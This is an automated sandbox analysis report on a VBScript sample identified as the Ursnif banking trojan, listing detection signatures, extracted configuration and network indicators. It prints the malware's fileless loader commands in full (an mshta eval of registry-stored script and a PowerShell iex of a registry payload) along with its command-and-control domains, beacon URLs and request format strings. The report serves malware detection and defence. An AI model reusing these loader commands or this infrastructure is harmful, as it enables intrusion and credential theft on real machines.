Loading ...

Play interactive tourEdit tour

Analysis Report PtgzM1Gd04Up.vbs

Overview

General Information

Sample Name:PtgzM1Gd04Up.vbs
Analysis ID:284873
MD5:0671e735481a55031081895bf0f57760
SHA1:11788132e8b10e6370530d68d2d562737ef1dae0
SHA256:f9ad25e0810fc3f545213be438f531677595044c6a64d6b367e93b9aad9910e6

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4256 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PtgzM1Gd04Up.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 4976 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4324 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:4068644 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3820 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:9484 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3064 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4976 CREDAT:75036 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 1308 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5540 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1572 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 420 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCAFE.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD3EB2606A30F49E59B9A84403A1A868D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5832 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\z00zcx10.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5764 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD743.tmp' 'c:\Users\user\AppData\Local\Temp\CSC711CCB0208342BE82936D1DDCB3B6.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 2288 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\90E6.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5796 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 244 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\90E6.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • control.exe (PID: 632 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 5436 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10", "version": "250155", "uptime": "275", "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8", "action": "00000001", "id": "1100", "time": "1600071833", "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5540, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', ProcessId: 1572
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1308, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5540
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5540, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cwptyz3z.cmdline', ProcessId: 1572
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 632, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5436

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\ogress.psdAvira: detection malicious, Label: TR/Kryptik.fklcr
            Found malware configurationShow sources
            Source: explorer.exe.3508.29.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.10", "version": "250155", "uptime": "275", "system": "b3683a3d0e66b42e1ff2a9f4849c6b42", "crc": "434b8", "action": "00000001", "id": "1100", "time": "1600071833", "user": "f73be0088695dc15e71ab15c4c34f37a", "soft": "1"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: api3.lepini.atVirustotal: Detection: 6%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 8%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\ogress.psdVirustotal: Detection: 7%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\ogress.psdReversingLabs: Detection: 25%
            Multi AV Scanner detection for submitted fileShow sources
            Source: PtgzM1Gd04Up.vbsVirustotal: Detection: 19%Perma Link
            Source: C:\Windows\explorer.exeCode function: 29_2_04D0FD7C FindFirstFileW,FindFirstFileW,29_2_04D0FD7C
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:79.0) Gecko/20100101 Firefox/79.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Uses nslookup.exe to query domainsShow sources
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/4cWzoWXzIMudPPFeH/zfwY1OFNMk6A/uxIsOO9XowW/7kFoCfkfah_2BV/bjG0FzF8tkMfsfO9WibRs/z5SQzweKlMCW_2Bf/r3FHVUdIQ7_2B2F/4OggET4YVDlHnn9cEt/R_2FbmgPY/r_2B9Ijs2bxGBYWN157X/EHLvOSxdZEysAMq3hvU/MO7ssYO3b9BR2qwc73_2BM/qSiRGq20QKCka/MMWlF28y/KLXW_2BJT56aQAQ7YU8EjqN/2JsZzAR8j1/xbv8cnzdbfuDeI002/Z_0A_0Du4aCB/iVnAW6cFBzY/T9beXtW5wNqhrT/3IUVp4YjtpqX/o44VY HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/ZrPM67eDMe0PJ3bd_2/FxYQ81wrj/FZQ351HtZv0VYLflOyX0/44ew0J0pAyJ2Zdt06J1/ejOutO4MWBnDs5A4maeYdF/TBoJIgwOCHRt8/zoJ_2FqC/ObYSEQUT98biFMg2p_2FLGO/Xe2sFFEt_2/BXVMVxynFtgTL14VJ/FomSQ9vCfuSu/ZDzzaPIbP4h/UGxi94rwNTQaqm/5H4Z_2BzYq0JgTNSAUiFj/AI1qd5OmqqcNF1YR/Y9f6ejd6eQItj7o/6e_2BlTQlKCx6vht_0/A_0D_2FkX/2mc9WbUuipCdNpIesLm7/AmJocubwsIxSN8THOau/P2krAXI1XX1cFN9bNtH7jO/c5jZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/udPukZ9VjF4q9dYkKyR/FKWIM0ktsVkJHkieBAN318/9svVgQXxMnZKC/C3qjdQsT/xXyOPBhUkWhjObIGcRm4pOg/X2ghSrkPNJ/BFV3PYkVSqynhIZX0/z8cw3abh6ejc/qRsdswbWqP7/MozmpHSBnTRSly/muxskxDd4VCkj_2FZq9_2/FrmSrVCRtfsyaBuq/3Rbvb2aOOviCSur/3TAMqR4wgwK79P_2BX/um60KPfM1/n1uToq7rUKSO_2FCOBeY/jezBVFJCh_2FrZ_0A_0/DMhAHfv9uMKeCVVA7pZkld/wK9Z7iNRykPb1/EH4FQici/0vYDr4GEFcCM3JZanZOshh9/HY1 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/8C7l82RZD/IPNx_2BA6NUS8m1Meo_2/Fas2lkcyOv4_2FyXQQA/W0ZQwXgbdYzfWai3c5CkbI/em5fguyn1S8ys/vpVw9dvD/khZPTWdEQCV0N5AR0qa1YOQ/LvEPSTN_2F/zlA2gt8ynYhIMOHfr/IASIpnbuTOlg/DdcZGi8WPYI/NR3mJxPuW34_2F/az5LW_2FJU_2BFw_2FsqB/vWjp2JDa_2Fg14a2/OTYnqh9mlzVPBkV/fSy7aPAm0_2BP4YyPN/c8k0VMTpv/7Lv8jSScGYAfEur_0A_0/DYV_2Fv17qFzbgLKlQu/3u2R7Gz5WRVQ7nkvK55OrO/9i9B3_2BMh/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Host: api3.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/n3L9lcGQWucW/ej8OoZYqYIS/qXKKw05yNY8m6C/sIwmpsT57_2BC61WFCPNP/yRuWmkpJOA5akf0b/bNLsbtLqpQ29JXE/GP5k1v91FymLa5DQtI/OCDbHUhQZ/fcbJOzIIFU9rJvmqoBnO/w0gRKfdB79tXuhFoLvP/d2sQ3SKwyUaMPAHzUDn1AD/_2FGn_2Bm3otg/2r86MlCl/Hj4_2F2OwjgRkb0nTVl3z6Q/0WYrmJnvEh/4MpDHwU2mFKd8OikK/_2BbtrY5iV9f/mS_0A_0Dmze/1NUYbLxCWeOqq3/MzK7cHLvfsovO5hnqCChW/oWreT_2B/ViD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Host: api3.lepini.at
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml1.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5798282a,0x01d68a70</date><accdate>0x5798282a,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579c9ee9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x579c9ee9,0x01d68a70</date><accdate>0x579d62c9,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579e3bd2,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x579e3bd2,0x01d68a70</date><accdate>0x579ec4f1,0x01d68a70</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
